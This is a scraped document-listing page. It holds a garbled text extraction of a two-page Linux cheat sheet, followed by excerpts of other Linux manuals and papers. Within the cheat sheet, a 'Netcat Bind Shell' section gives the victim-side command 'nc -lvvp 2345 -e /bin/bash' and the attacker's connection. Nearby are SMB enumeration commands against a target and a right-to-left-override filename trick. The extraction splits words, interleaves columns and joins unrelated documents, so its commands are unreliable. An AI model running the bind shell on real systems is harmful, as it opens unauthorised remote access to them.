Linux Things I Forget Cheat Sheet by Fred Via Cheatography.Com/22666/Cs/9068

Total Page:16

File Type:pdf, Size:1020Kb

Linux Things I Forget Cheat Sheet by Fred Via Cheatography.Com/22666/Cs/9068 Linux Things I Forget Cheat Sheet by fred via cheatography.com/22666/cs/9068/ AWK | CAT | GREP Boot Process Command Line Cheatsheet Monitoring & Processes (cont) AWK 1. Power on WATCH Find line number of IP 2. BIOS sudo pip install cheat watch ls (run ls every 2secs) awk '/197.12​ 8.145​ .39/{ 3. MBR - 1st sector of HDD cheat netstat TOP 4. GRUB print NR; exit }' ips.txt Cheatsh​ eets are stored in ~/.cheat/ top (view processes in detail) 5. Kernel CAT Edit a cheatsh​ eet htop (better alterna​ tive) 6. initramfs - Initial RAM disk With line numbers cheat -e foo CRON JOBS 7. init - /sbin/init (daemons and cat -n file.txt services) crontab -e (list and edit GREP 8. Command shell using getty ASCII Table & Calculator cronjobs) grep "h​ re​ f​ =​ " index.html | cut -d"/"​ - Generate your crontab line easily: 9. GUI - X Windows man ascii (show ascii table) f3 | grep icq.com | sort -u > Disable services from loading on http://​ cro​ nta​ b-g​ ene​ rat​ or.org/ ​ icqserv​ er​ .txt bc (command line calculator) login Count occurences of \x in systemctl disable apache2 SSL Certifi​ cates 1906.py Permiss​ ions (disable apache from auto-st​ arting cat 1906.py | grep -o \x |wc -l Follow instructions at - ​ on boot/lo​ gin) Change ownership https://certbot.eff.org/ Find line number of IP sudo chown username To generate an auto-re​ newal grep -n 197.128​ .14​ 5.39 ips.txt Unicode filename cronjob - Clone ownersh​ ip http://​ cro​ nta​ b-g​ ene​ rat​ or.org/ Network http://​ sup​ eru​ ser​ .co​ m/q​ ues​ tio​ ns/​ 594​ 18​ EXAMPLE: /how​ -to​ -ty​ pe-​ spe​ cia​ l-c​ har​ act​ ers​ - chown -- Show all eth network interfa​ ces, crontab -e in​ -linux refer​ enc​ e=o​ the​ rfile e.g. eth0, eth1... 17 3 * /root/c​ ert​ bot​ -auto renew -- Example - RTL Override thisfile dmesg | grep ^eth quiet --no-se​ lf-​ upg​ rade Hold CTRL+SH​ IFT+U, then type in Restart Network​ ing 202e FIND Hotkeys sudo service network​ - The invisible right-t​ o-left override Case insensi​ tive -iname ma​ nager restart character will be inserted and Nautilus (Switch views) Whatp​ ort​ is anything typed after this character sudo find -iname CTRL+1 pip install whatpor​ tis will be backwards. fileorf​ old​ ern​ ame CTRL+2 whatpo​ rtis 21 sudo find -iname CTRL+3 CTRL+H (show hidden) CIDR Calcula​ tion Command Line Cheatsheet fileorf​ old​ ern​ ame* CTRL+L (show location) sudo apt-get install Create and view interac​ tive Nautilus Graphical Mode Search sipcalc cheatsh​ eets on the command​ -line! XARGS ALT+F2 sipcalc 192.168​ .1.0/24 Set editor in path Pings​ weep Deleted files go to nano .bashrc (in your home echo 192.168​ .9.{20​ 0..250} "~​ /.lo​ ca​ l/s​ har​ e/T​ ras​ h/f​ ile​ s/"​ directory) DIFF & NDIFF (File Compari​ son) | xargs -n 1 -P0 ping -c Delete or CTRL+De​ lete = Move to export EDITOR=​ "/bi​ n/n​ ano​ " Trash diff file1 file2 (compare 1 | grep "b​ ytes from" Install and use cheat Shift+D​ elete = Permanent Delete files line by line) Run command against files from ndiff file1 file2 (compare 2 find nmap scans for changes) find * | xargs exiftool (Run exiftool against all files in current directory and subdire​ cto​ ries) TREE (Directory Tree) Show a directory tree tree directo​ ryn​ ame By fred Published 9th September, 2016. Sponsored by CrosswordCheats.com cheatography.com/fred/ Last updated 12th October, 2016. Learn to solve cryptic crosswords! Page 1 of 2. http://crosswordcheats.com Linux Things I Forget Cheat Sheet by fred via cheatography.com/22666/cs/9068/ VI & VIM Multiple Commands IP Assignment SMB (Samba, NETBIOS) (cont) I / INS = Insert Mode cat rubbish​ .txt; ls MANUAL smbclient -I SELEC​ TING TEXT Note: Changes are nonpers​ ist​ ent. 192.168​ .92​ .131 -R v = select range Netcat Bind Shell To make changes permanent, edit virnet.com -N -U (capital i, -R V = select entire line ​ ​ ​ ​ ​ /etc/network/interfaces file. = domain, -N = no pass, -U = user)​ d = delete selected text Victim ifconfig eth0 nc -lvvp 2345 -e COPY/​ PAS​ TE 192.168​ .72​ .10​ 0/24 (configure TMUX /bin/bash y = copy selection IP) yy = copy line https:/​ /da​ nie​ lmi​ ess​ ler​ .co​ m/s​ tud​ y/t​ mu Attac​ ker route add default gw p = paste before cursor ​ x/ nc -vn 192.168.1.177 2345 192.168​ .72.2 (add gateway) DELETE ssh [email protected] echo nameserver 4.2.2.2 > dd = delete line tmux Base64 Encode & Decode etc/res​ olv​ .conf (add DNS to x = cut selected text nmap -A etc... d$ = delete from cursor to end of python resolv.conf) CTRL+B, D (to exit and keep line ​ ​ ​ ​ ​ ​ AUTO "blah".encode('base64') session running) UNDO / REDO dhclient eth0 "YXN​ jaW​ kxL​ nR4​ dA=​ =".de​ co​ de(​ If the session dies u = undo last action ifconfig 'ba​ se6​ 4') ssh [email protected] CTRL+R = redo last action killall dhclient tmux attach (to connect to first EXIT ps -ef | grep dhclient Encrypted Volumes available session) ZZ = save and quit :w = save http://​ ask​ ubu​ ntu​ .co​ m/q​ ues​ tio​ ns/​ 635​ 94​ Proxych​ ains :q! = quit without saving /mou​ nt-​ enc​ ryp​ ted​ -vo​ lum​ es-​ VNC Server FIND AND REPLACE fro​ m-c​ omm​ and​ -li​ ne#​ 63598 http://​ pro​ xyc​ hai​ ns.sou​ rce​ for​ ge.net​ /ho​ apt-get install :%s/eth​ 0/b​ r0/g = find eth0 and sudo apt-get install wto​ .html tightvn​ cse​ rver replace with br0 cryptse​ tup /etc/p​ rox​ ych​ ain​ s.co​ nf vncser​ ver :%s#</f​ ont​ >#b​ lah#g = find </fo​ nt> Decrypt & Mount (usage info) You will require a password to and replace with blah proxyc​ hains firefox sudo cryptsetup luksOpen access your desktop​ s... google.com /dev/sda1 View only password? n NANO my_encr​ ypt​ ed_​ vol​ ume Resolve google.com through proxy netstat -antp | grep vnc specified by proxych​ ain​ s.conf Copy and Paste sudo mkdir (usually runs on port 5901) ALT+6 and CTRL+U /media/​ my_​ dev​ ice Show line numbers SMB (Samba, NETBIOS) sudo mount nano -c filename /dev/ma​ ppe​ r/m​ y_e​ ncr​ ypt​ ed_​ v RPCCl​ ient olume /media/​ my_​ dev​ ice http://​ car​ nal​ 0wn​ age​ .at​ tac​ kre​ sea​ rch​ .c​ Output om/2​ 010​ /06​ /mo​ re-​ Unmount & Lock wit​ h-r​ pcc​ lie​ nt.html To screen and file sudo umount enum4l​ inux -U -o command1 2>&1 | tee /media/​ my_​ dev​ ice 192.168​ .1.200 log.txt sudo cryptsetup luksClose SMBCl​ ient ls -al | tee file.txt my_encr​ ypt​ ed_​ vol​ ume smbclient -L //TARGE​ TIP Append to screen and file Auto-​ mount to Location (​ list shares)​ command1 | tee -a log.txt sudo udisks --mount smbclient //TARGE​ TIP​ /tmp /dev/ma​ ppe​ r/m​ y_e​ ncr​ ypt​ ed_​ v (connect to tmp folder) ol​ ume By fred Published 9th September, 2016. Sponsored by CrosswordCheats.com cheatography.com/fred/ Last updated 12th October, 2016. Learn to solve cryptic crosswords! Page 2 of 2. http://crosswordcheats.com.
Recommended publications
  • Linux Commands Cheat Sheet
    LINUX COMMANDS CHEAT SHEET System File Permission uname => Displays Linux system information chmod octal filename => Change file permissions of the file to octal uname -r => Displays kernel release information Example uptime => Displays how long the system has been running including chmod 777 /data/test.c => Set rwx permissions to owner, group and everyone (every- load average one else who has access to the server) hostname => Shows the system hostname chmod 755 /data/test.c => Set rwx to the owner and r_x to group and everyone hostname -i => Displays the IP address of the system chmod 766 /data/test.c => Sets rwx for owner, rw for group and everyone last reboot => Shows system reboot history chown owner user-file => Change ownership of the file date => Displays current system date and time chown owner-user: owner-group => Change owner and group owner of the file timedatectl => Query and change the System clock file_name chown owner-user:owner-group- => Change owner and group owner of the directory cal => Displays the current calendar month and day directory w => Displays currently logged in users in the system whoami => Displays who you are logged in as Network finger username => Displays information about the user ip addr show => Displays IP addresses and all the network interfaces Hardware ip address add => Assigns IP address 192.168.0.1 to interface eth0 192.168.0.1/24 dev eth0 dmesg => Displays bootup messages ifconfig => Displays IP addresses of all network interfaces cat /proc/cpuinfo => Displays more information about CPU e.g model, model name, cores, vendor id ping host => ping command sends an ICMP echo request to establish a connection to server / PC cat /proc/meminfo => Displays more information about hardware memory e.g.
    [Show full text]
  • Chapter 19 RECOVERING DIGITAL EVIDENCE from LINUX SYSTEMS
    Chapter 19 RECOVERING DIGITAL EVIDENCE FROM LINUX SYSTEMS Philip Craiger Abstract As Linux-kernel-based operating systems proliferate there will be an in­ evitable increase in Linux systems that law enforcement agents must process in criminal investigations. The skills and expertise required to recover evidence from Microsoft-Windows-based systems do not neces­ sarily translate to Linux systems. This paper discusses digital forensic procedures for recovering evidence from Linux systems. In particular, it presents methods for identifying and recovering deleted files from disk and volatile memory, identifying notable and Trojan files, finding hidden files, and finding files with renamed extensions. All the procedures are accomplished using Linux command line utilities and require no special or commercial tools. Keywords: Digital evidence, Linux system forensics !• Introduction Linux systems will be increasingly encountered at crime scenes as Linux increases in popularity, particularly as the OS of choice for servers. The skills and expertise required to recover evidence from a Microsoft- Windows-based system, however, do not necessarily translate to the same tasks on a Linux system. For instance, the Microsoft NTFS, FAT, and Linux EXT2/3 file systems work differently enough that under­ standing one tells httle about how the other functions. In this paper we demonstrate digital forensics procedures for Linux systems using Linux command line utilities. The ability to gather evidence from a running system is particularly important as evidence in RAM may be lost if a forensics first responder does not prioritize the collection of live evidence. The forensic procedures discussed include methods for identifying and recovering deleted files from RAM and magnetic media, identifying no- 234 ADVANCES IN DIGITAL FORENSICS tables files and Trojans, and finding hidden files and renamed files (files with renamed extensions.
    [Show full text]
  • “Linux at the Command Line” Don Johnson of BU IS&T  We’Ll Start with a Sign in Sheet
    “Linux at the Command Line” Don Johnson of BU IS&T We’ll start with a sign in sheet. We’ll end with a class evaluation. We’ll cover as much as we can in the time allowed; if we don’t cover everything, you’ll pick it up as you continue working with Linux. This is a hands-on, lab class; ask questions at any time. Commands for you to type are in BOLD The Most Common O/S Used By BU Researchers When Working on a Server or Computer Cluster Linux is a Unix clone begun in 1991 and written from scratch by Linus Torvalds with assistance from a loosely-knit team of hackers across the Net. 64% of the world’s servers run some variant of Unix or Linux. The Android phone and the Kindle run Linux. a set of small Linux is an O/S core programs written by written by Linus Richard Stallman and Torvalds and others others. They are the AND GNU utilities. http://www.gnu.org/ Network: ssh, scp Shells: BASH, TCSH, clear, history, chsh, echo, set, setenv, xargs System Information: w, whoami, man, info, which, free, echo, date, cal, df, free Command Information: man, info Symbols: |, >, >>, <, ;, ~, ., .. Filters: grep, egrep, more, less, head, tail Hotkeys: <ctrl><c>, <ctrl><d> File System: ls, mkdir, cd, pwd, mv, touch, file, find, diff, cmp, du, chmod, find File Editors: gedit, nedit You need a “xterm” emulation – software that emulates an “X” terminal and that connects using the “SSH” Secure Shell protocol. ◦ Windows Use StarNet “X-Win32:” http://www.bu.edu/tech/support/desktop/ distribution/xwindows/xwin32/ ◦ Mac OS X “Terminal” is already installed Why? Darwin, the system on which Apple's Mac OS X is built, is a derivative of 4.4BSD-Lite2 and FreeBSD.
    [Show full text]
  • The Linux Command Line
    The Linux Command Line Fifth Internet Edition William Shotts A LinuxCommand.org Book Copyright ©2008-2019, William E. Shotts, Jr. This work is licensed under the Creative Commons Attribution-Noncommercial-No De- rivative Works 3.0 United States License. To view a copy of this license, visit the link above or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042. A version of this book is also available in printed form, published by No Starch Press. Copies may be purchased wherever fine books are sold. No Starch Press also offers elec- tronic formats for popular e-readers. They can be reached at: https://www.nostarch.com. Linux® is the registered trademark of Linus Torvalds. All other trademarks belong to their respective owners. This book is part of the LinuxCommand.org project, a site for Linux education and advo- cacy devoted to helping users of legacy operating systems migrate into the future. You may contact the LinuxCommand.org project at http://linuxcommand.org. Release History Version Date Description 19.01A January 28, 2019 Fifth Internet Edition (Corrected TOC) 19.01 January 17, 2019 Fifth Internet Edition. 17.10 October 19, 2017 Fourth Internet Edition. 16.07 July 28, 2016 Third Internet Edition. 13.07 July 6, 2013 Second Internet Edition. 09.12 December 14, 2009 First Internet Edition. Table of Contents Introduction....................................................................................................xvi Why Use the Command Line?......................................................................................xvi
    [Show full text]
  • Configuration and Administration of Networking for Fedora 23
    Fedora 23 Networking Guide Configuration and Administration of Networking for Fedora 23 Stephen Wadeley Networking Guide Draft Fedora 23 Networking Guide Configuration and Administration of Networking for Fedora 23 Edition 1.0 Author Stephen Wadeley [email protected] Copyright © 2015 Red Hat, Inc. and others. The text of and illustrations in this document are licensed by Red Hat under a Creative Commons Attribution–Share Alike 3.0 Unported license ("CC-BY-SA"). An explanation of CC-BY-SA is available at http://creativecommons.org/licenses/by-sa/3.0/. The original authors of this document, and Red Hat, designate the Fedora Project as the "Attribution Party" for purposes of CC-BY-SA. In accordance with CC-BY-SA, if you distribute this document or an adaptation of it, you must provide the URL for the original version. Red Hat, as the licensor of this document, waives the right to enforce, and agrees not to assert, Section 4d of CC-BY-SA to the fullest extent permitted by applicable law. Red Hat, Red Hat Enterprise Linux, the Shadowman logo, JBoss, MetaMatrix, Fedora, the Infinity Logo, and RHCE are trademarks of Red Hat, Inc., registered in the United States and other countries. For guidelines on the permitted uses of the Fedora trademarks, refer to https://fedoraproject.org/wiki/ Legal:Trademark_guidelines. Linux® is the registered trademark of Linus Torvalds in the United States and other countries. Java® is a registered trademark of Oracle and/or its affiliates. XFS® is a trademark of Silicon Graphics International Corp. or its subsidiaries in the United States and/or other countries.
    [Show full text]
  • Arxiv:1802.08979V2 [Cs.CL] 2 Mar 2018 Parsing Benchmarks (Dahl Et Al., 1994; Popescu Et Al., 2003)
    NL2Bash: A Corpus and Semantic Parser for Natural Language Interface to the Linux Operating System Xi Victoria Lin*, Chenglong Wang, Luke Zettlemoyer, Michael D. Ernst Salesforce Research, University of Washington, University of Washington, University of Washington [email protected], fclwang,lsz,[email protected] Abstract We present new data and semantic parsing methods for the problem of mapping English sentences to Bash commands (NL2Bash). Our long-term goal is to enable any user to perform operations such as file manipulation, search, and application-specific scripting by simply stating their goals in English. We take a first step in this domain, by providing a new dataset of challenging but commonly used Bash commands and expert-written English descriptions, along with baseline methods to establish performance levels on this task. Keywords: Natural Language Programming, Natural Language Interface, Semantic Parsing 1. Introduction We constructed the NL2Bash corpus with frequently used The dream of using English or any other natural language Bash commands scraped from websites such as question- to program computers has existed for almost as long as answering forums, tutorials, tech blogs, and course materi- the task of programming itself (Sammet, 1966). Although als. We gathered a set of high-quality descriptions of the significantly less precise than a formal language (Dijkstra, commands from Bash programmers. Table 1 shows several 1978), natural language as a programming medium would examples. After careful quality control, we were able to be universally accessible and would support the automation gather over 9,000 English-command pairs, covering over of highly repetitive tasks such as file manipulation, search, 100 unique Bash utilities.
    [Show full text]
  • Scripting in Axis Network Cameras and Video Servers
    Scripting in Axis Network Cameras and Video Servers Table of Contents 1 INTRODUCTION .............................................................................................................5 2 EMBEDDED SCRIPTS ....................................................................................................6 2.1 PHP .....................................................................................................................................6 2.2 SHELL ..................................................................................................................................7 3 USING SCRIPTS IN AXIS CAMERA/VIDEO PRODUCTS ......................................8 3.1 UPLOADING SCRIPTS TO THE CAMERA/VIDEO SERVER:...................................................8 3.2 RUNNING SCRIPTS WITH THE TASK SCHEDULER...............................................................8 3.2.1 Syntax for /etc/task.list.....................................................................................................9 3.3 RUNNING SCRIPTS VIA A WEB SERVER..............................................................................11 3.3.1 To enable Telnet support ...............................................................................................12 3.4 INCLUDED HELPER APPLICATIONS ..................................................................................13 3.4.1 The image buffer - bufferd........................................................................................13 3.4.2 sftpclient.........................................................................................................................16
    [Show full text]
  • Subcontractors – Bc, Xargs, Find
    Subcontractors – bc , xargs , find David Morgan © David Morgan 2011- 14 bc – math help for the shell interactive or programatic can accept its commands from stdin can accept an entire bc program’s worth © David Morgan 2011-14 1 bc – math help for shell bc, commanded interactively by user does what shell cannot e.g. high-precision math ( & much more ) bc, commanded non-interactively by shell shell, by extension, does high-precision can embed bc code wholesale as here document © David Morgan 2011-14 bc – shell script or bc interpreter script © David Morgan 2011-14 2 bc – math help for shell bc code, not bash shell code background: http://jeremykun.com/tag/simpsons-rule http://www.zweigmedia.com/RealWorld/integral/integral.html © David Morgan correct! 2011-14 bc – interactive math help for shell Wicked Cool Shell Scripts , Dave Taylor, p29 © David Morgan 2011-14 3 xargs produce list of vi’s backup files long list ‘em with xargs remove ‘em with xargs gone © David Morgan 2011-14 xargs filename too long to type command to avoid typing it what’s in the file? …oops cat needs filename as argument, not input xargs composes correct cat syntax by pasting its input onto cat’s command line produces: cat /root/class… etc etc produces: cat /etc/resolv.conf /root/class… etc etc xargs composes incorrect cp syntax by pasting its input onto cp’s command line produces: cp . /root/class… etc etc cp differs from cat, needs insertion from xargs not pasting control argument placement with xargs’ –I (xargs stuff goes where the special© char David appears, _ in this case) Morgan 2011-14 4 xargs and efficiency sleeptime totals 15 sec run sleeps simultaneously took 15 sec took 5 sec significant for compute-heavy commands distributes them across multi-cores – simultaneous execution © David Morgan 2011-14 xargs and efficiency commonly used with find to process files functionally equivalent – find .
    [Show full text]
  • $ Who Am I Mumbo Jumbo?
    Unix Crash Course Subjects (after lunch) ● Networking and the X windowing system ● Shell scripting concepts ● Regular expressions ● sed and awk ● Miscelanious (editing and programming) Unix Crash Course Slide 1 Unix Crash Course Slide 4 $ who am i Mumbo Jumbo? ● Rob Wolfram ● Unix System administrator ● E-mail: [email protected] ● PGP Key: 0xF7A0F7A0 Unix Crash Course Slide 2 Unix Crash Course Slide 5 Subjects (before lunch) Unix History ● A short history of Unix and Linux ● AT&T abandoned MULTICS ● Structure and philosophy of Unix ● Ken Thompson & Dennis Ritchie developed UNICS on a PDP7 ● Files and filesystems ● UNIX ported to Ritchie's C language ● Shell variables and globbing ● BSD released, many ports followed ● Processes and jobs ● POSIX effort to unify Unices ● GNU project / Linux kernel Unix Crash Course Slide 3 Unix Crash Course Slide 6 Unix History Unix philosophy ● Everything is a file ● Combine small tools to build your requirement Ritchie and Thompson working on a PDP11/20 at Bell Labs Unix Crash Course Slide 7 Unix Crash Course Slide 10 Unix History Unix structure Unix has an onion-like structure, the hardware is handled by the kernel Unix Crash Course Slide 8 Unix Crash Course Slide 11 (Gnu/) Linux distros Kernel provisions The kernel provides: ● CPU scheduling of processes ● Accessing hardware ● System calls for user-land programs ● The filesystem ● Privilege separation etc. Unix Crash Course Slide 9 Unix Crash Course Slide 12 Multi-user environment File permissions ● Unix runs programs from multiple users concurrently,
    [Show full text]
  • USER MANUAL GWR High Speed Cellular Router Series
    GWR USER MANUAL GWR High Speed Cellular Router Series Document version 1.0.0 Date: December 2015 WWW.GENEKO.RS User Manual Document History Date Description Author Comments 24.12.2015 User Manual Tanja Savić Firmware versions: 1.1.2 Document Approval The following report has been accepted and approved by the following: Signature Printed Name Title Date Dragan Marković Executive Director 24.12.2015 GWR High Speed Cellular Router Series 2 User Manual Content DOCUMENT APPROVAL ........................................................................................................................................ 2 LIST OF FIGURES .................................................................................................................................................... 5 LIST OF TABLES ...................................................................................................................................................... 8 DESCRIPTION OF THE GPRS/EDGE/HSPA ROUTER SERIES ...................................................................... 9 TYPICAL APPLICATION ............................................................................................................................... 10 TECHNICAL PARAMETERS ......................................................................................................................... 11 PROTOCOLS AND FEATURES ...................................................................................................................... 14 PRODUCT OVERVIEW ...............................................................................................................................
    [Show full text]
  • GNU Findutils Finding Files Version 4.8.0, 7 January 2021
    GNU Findutils Finding files version 4.8.0, 7 January 2021 by David MacKenzie and James Youngman This manual documents version 4.8.0 of the GNU utilities for finding files that match certain criteria and performing various operations on them. Copyright c 1994{2021 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license is included in the section entitled \GNU Free Documentation License". i Table of Contents 1 Introduction ::::::::::::::::::::::::::::::::::::: 1 1.1 Scope :::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 1 1.2 Overview ::::::::::::::::::::::::::::::::::::::::::::::::::::::: 2 2 Finding Files ::::::::::::::::::::::::::::::::::::: 4 2.1 find Expressions ::::::::::::::::::::::::::::::::::::::::::::::: 4 2.2 Name :::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 4 2.2.1 Base Name Patterns ::::::::::::::::::::::::::::::::::::::: 5 2.2.2 Full Name Patterns :::::::::::::::::::::::::::::::::::::::: 5 2.2.3 Fast Full Name Search ::::::::::::::::::::::::::::::::::::: 7 2.2.4 Shell Pattern Matching :::::::::::::::::::::::::::::::::::: 8 2.3 Links ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 8 2.3.1 Symbolic Links :::::::::::::::::::::::::::::::::::::::::::: 8 2.3.2 Hard Links ::::::::::::::::::::::::::::::::::::::::::::::: 10 2.4 Time
    [Show full text]
  • SYSTEM INFORMATION Hostname Internet (IP) Address Ethernet Address Hub and Port Numbers Emergency Contact Person Boot Command Di
    SYSTEM INFORMATION COMMON COMMAND EXAMPLES TOKENS USED IN SENDMAIL.CF Hostname ifconfig plumb # Solaris: probe for network interfaces Token Debug Meaning ifconfig lo0 127.0.0.1 up # Loopback interface ifconfig en0 inet 128.130.240.1 up netmask $@ Match zero tokens (V8 only) 0xFFFFFF00 broadcast 128.130.240.255 $- ^R Match exactly one token $+ ^Q Match one or more tokens Internet (IP) address route add net 128.130.138.0 128.130.240.12 1 $* ^P Match zero or more tokens route add default 128.130.240.12 1 $X Match value of macro variable X # BSD/OS and OSF/1 use –net and –host and no metric $&X Match value of X at run time route add –net 128.130.138.0 128.130.240.12 $=X ^SX Match any token in class X Ethernet address route add default 128.130.240.12 $~X ^TX Match any token not in class X netstat –rn # Routing table (numeric addresses) The Debug column shows the tokens as they will be printed netstat – en0 5 # Monitor en0 at 5-second intervals by sendmail in address test mode (sendmail -bt). netstat –in # Interfaces (numeric addresses) Hub and port numbers dump 0uf /dev/nrst0 /users # Level 0 dump DNS RECORD TYPES dump 0f – /usr | (cd /mnt; restore rvf –) # Copy tar cf – ./from | (cd todir; tar xvfp –) # Copy dir Type Syntax Emergency contact person # Find object files larger than 1MB not accessed in a year SOA zone [ttl] IN SOA primary admin serial find /users –type f –name "*.o" –size +1048576c refresh retry expire min –atime +365 –print NS zone [ttl] IN NS host # List all C source files sorted by number of lines A hostname [ttl] IN A ipaddr PTR ipaddr [ttl] IN PTR hostname Boot command find .
    [Show full text]